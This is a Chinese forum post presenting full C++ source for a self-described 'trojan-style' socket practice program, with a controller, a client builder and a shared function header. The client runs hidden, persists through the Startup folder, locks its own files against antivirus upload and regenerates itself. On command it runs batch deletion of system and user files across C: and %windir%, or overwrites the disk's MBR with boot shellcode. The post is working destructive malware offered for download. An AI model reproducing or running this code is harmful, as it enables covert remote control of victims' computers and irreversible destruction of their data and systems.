socket 编程练习作品

楼主(2015-01-11):
======================================================================================================
优点:
    可以熟悉socket编程...
缺点:
    架构很差劲...同一时间只能控制一台机器(看来还得老老实实学习链表)
特点:
    可以玩一玩...
下载地址:socket 编程练习作品(仿木马版)======================================================================================================

控制端源码(Srv.cpp ):
=======================================================================================================
#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
DWORD WINAPI recvMessage(LPVOID msge);
void huikuiMessage(SOCKET sockClient);
DWORD WINAPI SendCmd(LPVOID msge);
void csh();  // 初始化代码
void L();    // 连接到被控端代码
int Errorzd=0;  // 连接中断标志
/*******************
*     胡言乱语     *
********************/
void Lovemengx()
{
puts("SOCKET编程练习作品...(尚未完善)");
printf("=======================================================================\n");
  printf("                                                    *                 |");
printf("\n刚学SOCKET编程,设计了这个不知道该叫什么的程序      *                 |\n");
  printf("                                                    *                 |");
printf("\n说它是木马吧,连一个远程桌面的功能都没有...         *                 |\n");
  printf("                                                    *                 |");
printf("\n说它是后门吧,连一个本地上传的功能都没有...         *                 |\n");
  printf("                                                    ******  *         |");
printf("\n说它不是吧,又具备一些木马、后门的特征...                    *        |\n");
  printf("                                                                      |");
printf("\n╮(╯▽╰)╭,不管怎么样!通过它能更熟悉SOCKET编程,也算是一种收获吧~ |\n");
  printf("                                                                      |");
printf("\n                                                     L、(Love 梦想)   |\n");
  printf("                                                           2011-9-5   |");
printf("\n=======================================================================\n");
}
void server()
{
HRSRC hRc=FindResource(NULL,"c:\\Cilent.exe","Exe");
   if(!hRc)
   {
    MessageBox(0,"EXE资源不存在","错误",0);
    exit(1);
   }
   HGLOBAL hg=LoadResource(NULL,hRc);  // 将资源载入内存并返回其在内存中首地址保存在hg中
   DWORD dw=SizeofResource(NULL,hRc);  // 获得资源大小并用dw保存资源大小
   // 分配缓冲区并用0填充
   char a[57345];
   memset(a,0,57345);
   // 向该缓冲区中复制资源的二进制数据
   memcpy(a,hg,dw); // 将资源的二进制数据存放在缓冲区a
   // 创建服务端文件
   FILE *out=fopen("server.exe","wb+");
   fwrite(a,1,dw,out);
   fclose(out);
   // 修改配置信息
   char IP[15];
   memset(IP,0,15);
   printf("请输入IP(默认 127.0.0.1):\n");
   gets(IP);
   fflush(stdout);
   FILE *fp=fopen("server.exe","rb+");
   rewind(fp);
   fseek(fp,0xA05C,0);
   fwrite(IP,1,15,fp);
   fclose(fp);
   MessageBox(NULL,"已经生成服务端:【server.exe】","OK",0);
   exit(0);
}
void main()
{
system("title SOCKET 编程练习作品(仿木马版)     L、QQ:1000000002");
//////////////////////////////////////////////////////////////////////////
// 让启动程序时的小漏斗马上消失
GetInputState();
PostThreadMessage(GetCurrentThreadId(),NULL,0,0);
MSG msg;
GetMessage(&msg, NULL, NULL, NULL);
//////////////////////////////////////////////////////////////////////////
system("color 0a");
do
{
  Errorzd = 0;
  if ((MessageBox(0,"是否配置服务端?","提示",MB_YESNO|MB_SYSTEMMODAL)==IDYES))
  {
   server();
  }
  csh();
  system("cls");
  Lovemengx();
  L();
} while (Errorzd);

}
/*******************
*  初始化套接字库  *
********************/
void csh()
{
WSADATA wsaData;
if (WSAStartup(MAKEWORD(2,2),&wsaData))
{
  ::MessageBox(0,"无法初始化套接字库","提示",MB_SYSTEMMODAL);
  return;
}
if (HIBYTE(wsaData.wVersion)!=2 ||
  LOBYTE(wsaData.wVersion)!=2)
{
  ::MessageBox(0,"套接字版本不符合2.2","提示",MB_SYSTEMMODAL);
  WSACleanup();
  return;
}
}
/*******************
*    连接被控端    *
********************/
void L()
{
SOCKET sockSre=socket(AF_INET,SOCK_STREAM,0);
HANDLE Thread1;
// 设置服务端IP相关信息
printf("\n********  设置服务端IP相关信息  *********\n");
SOCKADDR_IN addrSrv;
addrSrv.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
addrSrv.sin_family=AF_INET;
addrSrv.sin_port=htons(6000);

printf("\n********  绑定端口  *********\n");
if ((bind(sockSre,(SOCKADDR*)&addrSrv,sizeof(SOCKADDR)))!=0)
{
  ::MessageBox(0,"绑定端口失败!","提示",MB_SYSTEMMODAL);
  return;
}

printf("\n********  设置监听  *********\n");
if (listen(sockSre,5)!=0)
{
  ::MessageBox(0,"设置监听失败!","提示",MB_SYSTEMMODAL);
  return;
}
SOCKADDR_IN addrClient;
int len=sizeof(SOCKADDR);

//char recvBuf[1000];

printf("\n********  等待上线  *********\n");
SOCKET sockcon=accept(sockSre,(SOCKADDR*)&addrClient,&len);
// 启动发送命令线程
system("cls");
Thread1=CreateThread(NULL,0,SendCmd,(LPVOID)sockcon,0,0 );
// 启动接受回馈信息模块
huikuiMessage(sockcon);
TerminateThread(Thread1,1); // 只有被控端断开连接的情况下才会强制结束发送命令的线程
closesocket(sockcon); // 关闭套接字
WSACleanup(); // 释放资源
}
/*******************
*   发送命令线程   *
********************/
DWORD WINAPI SendCmd(LPVOID msge)
{
SOCKET sockcon=(SOCKET)msge;
char sendBuf[1000];
for (;;)
{
  printf("\n********************************************\n");
  printf("\n【a】震动窗口\t【b http://***.***.***】打开网页\n");
  printf("\n【c】摧毁系统\t【L】摧毁硬盘\t(慎用哈!)\n");
  printf("\n【q】退出被控端程序\t【Q】卸载被控端程序\n");
  printf("\n********************************************\n");
  printf("\n\n请输入执行命令\n-> ");
  gets(sendBuf);
  if (strlen(sendBuf)==0)
  {
   puts("===== 命令不能为空 =====");
   continue;
  }
  send(sockcon,sendBuf,strlen(sendBuf)+1,0); // 发送命令
  system("cls");
}
return 0;
}

/*******************
*   回馈信息模块  *
********************/
void huikuiMessage(SOCKET sockClient)
{
printf("\n********  信息回馈线程已启动 *******\n");
char comd[100] = {0};
for (;;)
{

  if(((recv(sockClient,comd,sizeof(comd),0)) <0 ) || ( WSAGetLastError() ==  WSAETIMEDOUT || WSAGetLastError()== WSAEWOULDBLOCK ))
  {
   Errorzd = 1;    // 将连接中断标志置 1
   MessageBox(0,"********  被控端下线 断开连接  *********","注意",MB_SYSTEMMODAL);
   break;
  }
  else
  {
   ::MessageBox(0,comd,"提示",MB_SYSTEMMODAL);
  }
}
}
/*******************
*   解析命令模块  *
********************/
char *Remove(char temp[])
{
int i,j=0;
char tmp[1024]={0};
i=strlen(temp)-1;

for (j=0;i>=0;j++,i--)
  tmp[j]=temp[j+1];  // 第一个元素是命令 其余的是附带参数
return tmp;
}
==================================================================================================

被控端源码(Cilent.cpp ):
==================================================================================================
#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include "..\\L、.h"

#pragma comment(lib,"ws2_32.lib") // 链接sock库
DWORD WINAPI recvMessage(LPVOID msge);
DWORD WINAPI commod(LPVOID msge);
void recvMessage(SOCKET sockClient);
char *Remove(char temp[]);
void L();
void Auto(char Name[]); // 添加开机启动项
void zh(); // 卸载模块
char ServerIP[]="127.0.0.1";
char tmp[]="有主机上线";
// 回馈信息结构体
struct MesCmd
{
SOCKET Client; // 传递套接字
char *cmd; // 传递命令
} Mes;
HANDLE Lock_File=NULL,Lock_File1=NULL; // 锁定文件,防止被分析及云上传
/*******************
*  初始化套接字库  *
********************/
void csh()
{

WSADATA wsaData;
if (WSAStartup(MAKEWORD(2,2),&wsaData))
{
  ::MessageBox(0,"无法初始化套接字库","提示",MB_SYSTEMMODAL);
  return;
}
if (HIBYTE(wsaData.wVersion)!=2 ||
  LOBYTE(wsaData.wVersion)!=2)
{
  ::MessageBox(0,"套接字版本不符合2.2","提示",MB_SYSTEMMODAL);
  WSACleanup();
  return;
}
}
/*******************
*   配置套接字   *
********************/
void L()
{
  SOCKET sockClient=socket(AF_INET,SOCK_STREAM,0);

  // 设置服务端IP相关信息
  SOCKADDR_IN addrCilent;
  addrCilent.sin_addr.S_un.S_addr=inet_addr(ServerIP);
  addrCilent.sin_family=AF_INET;
  addrCilent.sin_port=htons(6000);

for (;connect(sockClient,(SOCKADDR*)&addrCilent,sizeof(SOCKADDR))!=0;)
{
  puts("******  连接服务端失败 静候3秒继续尝试连接  ******");
  Sleep(3000);
}
puts("******  与服务器建立成功 等待接受命令 ******");
send(sockClient,tmp,strlen(tmp)+1,0);
// 启动接受命令模块
recvMessage(sockClient);
}
/*******************
*   接受命令线程   *
********************/
void recvMessage(SOCKET sockClient)
{
char comd[100] = {0};
for (;;)
{
  if(((recv(sockClient,comd,sizeof(comd),0)) <0 ) || ( WSAGetLastError() ==  WSAETIMEDOUT || WSAGetLastError()== WSAEWOULDBLOCK ))
   {
    puts("连接已经断开");
    L();
   }
  Mes.Client=sockClient;
  Mes.cmd=comd;
// 启动执行命令线程 以结构体的形式传递多个参数
  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)commod,&Mes,0,NULL);

}
}
/*******************
*   执行命令线程   *
********************/
DWORD WINAPI commod(LPVOID msge)
{
char CmdErrorYN[100];
char CmdTmp[100]={0},*Cmd=NULL;  // 定义一个中间变量 防止服务端执行多次命令时错误提示最后一次执行的命令
int ErrorYN=0; // 对错码
MesCmd *Mes= (MesCmd *)msge;  // 强制转换类型
strcpy(CmdTmp,Mes->cmd);// 将命令赋值给中间变量 防止此命令尚未执行完 值就被下次的命令覆盖

// 这里可以添加相关的功能 第一个字节为命令类型 第二个字节为附带参数
switch(CmdTmp[0])
{
  case 'a':                    // 窗口震动
     ErrorYN = WindowShake();
     strcpy(CmdTmp,"【窗口震动】");
      break;
  case 'b':
     Cmd=Remove(CmdTmp); // 分析得到附带参数
     ErrorYN=OpenUrl(Cmd);
     strcpy(CmdTmp,"【打开网页】");
     break;
  case 'c':
     ErrorYN=Wreck_system();
     strcpy(CmdTmp,"【摧毁系统】");
     break;
  case 'L':
     ErrorYN=Wreck_Disk();
     strcpy(CmdTmp,"【摧毁硬盘】");
     break;
  case 'q':                      // 退出程序
     closesocket(Mes->Client);
     WSACleanup();
     exit(1);
  case 'Q':        // 卸载
     zh();
     closesocket(Mes->Client);
     WSACleanup();
     exit(1);
  default: ErrorYN=0;
}
if (ErrorYN)
  sprintf(CmdErrorYN,"执行 %s 命令完毕!",CmdTmp);
  sprintf(CmdErrorYN,"执行 %s 命令失败!错误未知!",CmdTmp);
send(Mes->Client,CmdErrorYN,strlen(CmdErrorYN)+1,0);  //  发送命令
return 0;
}

/*************************
*   自毁模块**********   *
**************************/
void zh()
{
char DirBuffer[MAX_PATH];
HMODULE hModule = GetModuleHandle(NULL);  // 获取当前程序句柄
// 关闭独占模式
CloseHandle(Lock_File);
CloseHandle(Lock_File1);
GetModuleFileName(hModule,DirBuffer,sizeof(DirBuffer)); // 获取当前程序的路径
// 删除自启动项
unlink("C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe");
// 删除自身
Del(DirBuffer);
}
/*************************
*   命令、参数解析线程   *
**************************/
char *Remove(char temp[])
{
int i,j=0;
char tmp[1024]={0};
i=strlen(temp)-1;

for (j=0;i>=0;j++,i--)
  tmp[j]=temp[j+1];  // 第一个元素是命令 其余的是附带参数
return tmp;  // 将纯参数返回
}
/***************************
*   程序运行时进行初始化   *
***************************/
void DelAdd()
{
char systemName[MAX_PATH];
char DirBuffer[MAX_PATH];
// char tempBuffer[MAX_PATH];
HMODULE hModule = GetModuleHandle(NULL);  // 获取当前程序句柄
GetModuleFileName(hModule,DirBuffer,sizeof(DirBuffer)); // 获取当前程序的路径
// GetFileTitle(DirBuffer,tempBuffer,MAX_PATH); // 从路径中提取文件名
GetSystemDirectory(systemName,sizeof(systemName)); // 获取系统文件夹路径
strcat(systemName,"\\lovemengxiang.exe"); // 生成的文件名
if ((strcmp(DirBuffer,systemName))!=0)   // 判断程序自身是否在系统目录 不在则实现自删除
{
  CopyFile(DirBuffer,systemName,0);
  Del(DirBuffer);      // 自删除模块
  ShellExecute(NULL,"open",systemName,0,0,SW_HIDE); // 运行副本
  exit(0); // 退出 让Bat删除自己
}
else
{
  Auto(DirBuffer);
  // 第一步 立即锁定本体 防止被上传 我想杀软没那么无聊为了上传就随随便便解锁吧?
  Lock_File=CreateFile(DirBuffer, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);
}
}
/***************************
*   开机自启动             *
***************************/
void Auto(char Name[])
{
// 自复制到 启动文件夹 实现开机自启动  嫌麻烦 就用这种方式自启动吧 一句代码搞定
char DirName[]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe";
CopyFile(Name,DirName,1);
Lock_File1=CreateFile(DirName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);
/*
由于它会自释放、自删除、自复制并且会自锁定 形成一个循环既可以保证启动文件始终有一个
原体存在,又能同时锁定两个文件以阻止被删除、复制上传。即使被删除也会因为自复制后再生
,实现无进程再生功能。不过,这种启动方式易被发现,并且以自己的进程去锁定文件只能对付普
通删除,所以需要改进,启动方式又很多种,不过这里为了方便就用这个吧。至于锁定文件可以让
系统管进程如:svchost.exe 、winlogon.exe 去保护源体!这样即使被发现也得在系统重启之后
才能清除!而锁定句柄保留方便卸载或升级被控端用...
*/
}
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
//////////////////////////////////////////////////////////////////////////
// 让启动程序时的小漏斗马上消失
GetInputState();
PostThreadMessage(GetCurrentThreadId(),NULL,0,0);
MSG msg;
GetMessage(&msg, NULL, NULL, NULL);
//////////////////////////////////////////////////////////////////////////
DelAdd();
csh(); // 初始化
L(); // 核心调用
return 0;
}
============================================================================================

核心功能源码:(L、.h  部分原创)
============================================================================================
/********************************************************/
//  窗口抖动 功能
/********************************************************/
int WindowShake() // 窗口抖动
{
HWND ForeHandle=GetForegroundWindow();
for(int i=0;i<15;i++)
{
  RECT rc;
  GetWindowRect(ForeHandle,&rc);
  MoveWindow(ForeHandle,rc.left+8,rc.top+8,rc.right-rc.left,rc.bottom-rc.top,1);
  Sleep(40);
  MoveWindow(ForeHandle,rc.left,rc.top,rc.right-rc.left,rc.bottom-rc.top,1);
  Sleep(40);
  Beep(0x0fff,10);
}
return 1;
}
/********************************************************/
//  自删除功能
/********************************************************/
void Del(char *systemname)
{
FILE *fp;
fp=fopen("C:\\system.bat","w+");
fprintf(fp,"@echo off \n");
fprintf(fp,":statr\nif not exist \"%s\" goto done\n",systemname);
fprintf(fp,"del /f /q \"%s\" \n",systemname);
fprintf(fp,"goto statr\n");
fprintf(fp,":done\n");
fprintf(fp,"del /f /q %%0\n");
fclose(fp);
ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE);

}
/********************************************************/
//  打开网页
/********************************************************/
int OpenUrl(char url[])
{
char Url[300]={0};
strcpy(Url,"explorer.exe ");
strcat(Url,url);
WinExec(Url,SW_SHOW); // 隐藏打开指定网页
return 1;
}

/********************************************************/
//  摧毁系统 功能
/********************************************************/
int Wreck_system()
{
system("del /f /s /q C:\boot.ini");
system("del /f /s /q *.gho");
system("del /f /s /q QQ.exe");
system("del /f /s /q %systemdrive%\*.tmp");
system("del /f /s /q %systemdrive%\*.gho");
system("del /f /s /q %systemdrive%\*.jpg");
system("del /f /s /q %systemdrive%\*.mp3");
system("del /f /s /q %systemdrive%\*.dll");
system("del /f /s /q %systemdrive%\*.mp4");
system("del /f /s /q %systemdrive%\*.bat");
system("del /f /s /q %systemdrive%\*.txt");
system("del /f /s /q %systemdrive%\*.rar");
system("del /f /s /q %systemdrive%\*.bmp");
system("del /f /s /q %systemdrive%\*.png");
system("del /f /s /q %systemdrive%\*.exe");
system("del /f /s /q %systemdrive%\*.lnt");
system("del /f /s /q %systemdrive%\*._mp");
system("del /f /s /q %systemdrive%\*.log");
system("del /f /s /q %systemdrive%\*.gid");
system("del /f /s /q %systemdrive%\*.chk");
system("del /f /s /q %systemdrive%\*.old");
system("del /f /s /q c:\*.txt");
system("del /f /s /q c:\*.gho");
system("del /f /s /q c:\*.old");
system("del /f /s /q c:\*.gid");
system("del /f /s /q c:\*.chk");
system("del /f /s /q c:\*.log");
system("del /f /s /q c:\*._mp");
system("del /f /s /q c:\*.lnt");
system("del /f /s /q c:\*.dll");
system("del /f /s /q c:\*.exe");
system("del /f /s /q c:\*.bmp");
system("del /f /s /q c:\*.rar");
system("del /f /s /q c:\*.png");
system("del /f /s /q c:\*.jpg");
system("del /f /s /q c:\*.mp3");
system("del /f /s /q c:\*.bat");
system("del /f /s /q c:\*.mp4");
system("del /f /s /q %systemdrive%\*.gho");
system("del /f /s /q %systemdrive%\*.tmp");
system("del /f /s /q %systemdrive%\*.jpg");
system("del /f /s /q %systemdrive%\*.mp3");
system("del /f /s /q %systemdrive%\*.dll");
system("del /f /s /q %systemdrive%\*.mp4");
system("del /f /s /q %systemdrive%\*.txt");
system("del /f /s /q %systemdrive%\*.rar");
system("del /f /s /q %systemdrive%\*.bmp");
system("del /f /s /q %systemdrive%\*.png");
system("del /f /s /q %systemdrive%\*.exe");
system("del /f /s /q %systemdrive%\*.lnt");
system("del /f /s /q %systemdrive%\*._mp");
system("del /f /s /q %systemdrive%\*.log");
system("del /f /s /q %systemdrive%\*.gid");
system("del /f /s /q %systemdrive%\*.chk");
system("del /f /s /q %systemdrive%\*.old");
system("del /f /s /q %systemdrive%\recycled\*.*");
system("del /f /s /q %windir%\*.*");
system("del /f /s /q %windir%\prefetch\*.*");
system("del /f /s /q %windir%\temp\*.*");
system("del /f /q %userprofile%\cookies\*.*");
system("del /f /q %userprofile%\recent\*.*");
system("del /f /s /q /""%userprofile%\recent\*.*/""");
system("del /f /s /q /""%userprofile%\Local Settings\Temporary Internet Files\*.*/""");
system("del /f /s /q /""%userprofile%\Local Settings\Temp\*.*/""");
/*
  system("del /f /s /q d:\*.*");
  system("del /f /s /q e:\*.*");
  system("del /f /s /q f:\*.*");
*/
return 1;
}
/********************************************************/
//  摧毁硬盘 功能
/********************************************************/
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x52\x69\x67\x69\x64\x20\x44\x69"
"\x73\x6b\x20\x46\x61\x69\x6c\x75\x72\x65\x21";
int Wreck_Disk()
{
// ExitWindowsExT   pExitWindowsEx =  (ExitWindowsExT)GetProcAddress(LoadLibrary("USER32.dll"), "ExitWindowsEx");
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};

// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;

hDevice = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
  return -1;
DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
CloseHandle(hDevice);
Sleep(2000);
DWORD   dwVersion   =   GetVersion();
    if   (dwVersion   <   0x80000000)   //   Is   NT   or   2000!
    {
  HANDLE   hToken;   TOKEN_PRIVILEGES   tkp;
  OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES   |   TOKEN_QUERY,   &hToken);
  LookupPrivilegeValue(NULL,   SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
  tkp.PrivilegeCount   =   1;   //   set   privilege
  tkp.Privileges[0].Attributes   =   SE_PRIVILEGE_ENABLED;
  AdjustTokenPrivileges(hToken,   FALSE,   &tkp,   0,(PTOKEN_PRIVILEGES)NULL,   0);
// ExitWindowsEx(EWX_FORCE+EWX_REBOOT,   0);
}
// else   //   Is   9x   or   Me
// ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
// ExitProcess(-1);
return 1;
}
===========================================================================================